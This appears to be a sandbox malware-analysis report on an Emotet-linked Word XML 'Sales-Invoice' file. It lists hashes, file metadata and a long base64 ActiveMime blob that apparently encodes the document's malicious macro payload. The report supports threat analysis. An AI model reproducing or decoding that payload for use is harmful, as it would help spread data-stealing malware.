download: | Sales-Invoice |
Full analysis: | https://app.any.run/tasks/6f335336-6fae-42f2-beea-17bcc8a40d6f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 22, 2019, 19:23:18 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 02AF2B2605265390740D1F6F615D1CB4 |
SHA1: | A20A20F3801276B628EF2C73BE7ABDD5C9DAB0A0 |
SHA256: | 7128E6E5E0516C991D67DDE86A8CA0A1D7AFAA529246C3D645E9445BE886E3E1 |
SSDEEP: | 3072:6uXLOI/PIwr8oAxJPjL/xSu90OoiLuDKZXfwKeljR1z:6u7r/PIwr8o2vxUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 006F3A2D |
WordDocumentBodySectPRsidRDefault: | 00E9115B |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 005A24B1 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | 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 